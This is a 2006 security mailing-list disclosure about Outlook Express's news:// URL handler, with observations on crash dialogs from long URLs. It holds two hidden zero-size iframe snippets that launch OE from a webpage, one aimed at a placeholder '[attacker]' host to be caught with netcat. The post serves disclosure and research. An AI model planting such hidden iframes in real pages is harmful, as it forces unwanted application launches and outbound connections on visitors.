[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] OE - news:// stupid url handler behavior
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] OE - news:// stupid url handler behavior
- From: "Morning Wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Thu, 5 Jan 2006 01:31:15 -0800
Jan 4, 2006
Donnie Werner
http://exploitlabs.com
Web Browser / Outlook Express - stupid url handler behavior
I doubt this warrants a fix ( nor Advisory ) , but it is realy dumb,
note the sidebar and titles in OE when testing.
these launch OE from a webpage
1.
==
hi
<iframe src=news://omg-h4ck3d\owned height=0 width=0></iframe>
2.
==
hi
<iframe src=news://[attacker]\owned height=0 width=0></iframe>
listen on netcat, tries to connect ( obviously )
other observations:
==================
there appears to be lenght limits to:
news://longstring
Windows cannot access the specified device, path, or file.
You may not have the appropriate permissions to access the item
and...
news//something/longstring
Outlook Express could not be started. It may not be installed correctly.
Make sure that your disk is not full or that you are out of memory.
Contact Microsoft support for further assistance. ( 0x80004005, 1411)
[ OK ]
Outlook Express could not be started because MSOE.DLL could not be
initalized.
Outlook Express may not be installed correctly.
remarks:
========
i leave other research open to the public
Donnie Werner
http://exploitlabs.com
http://zone-h.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/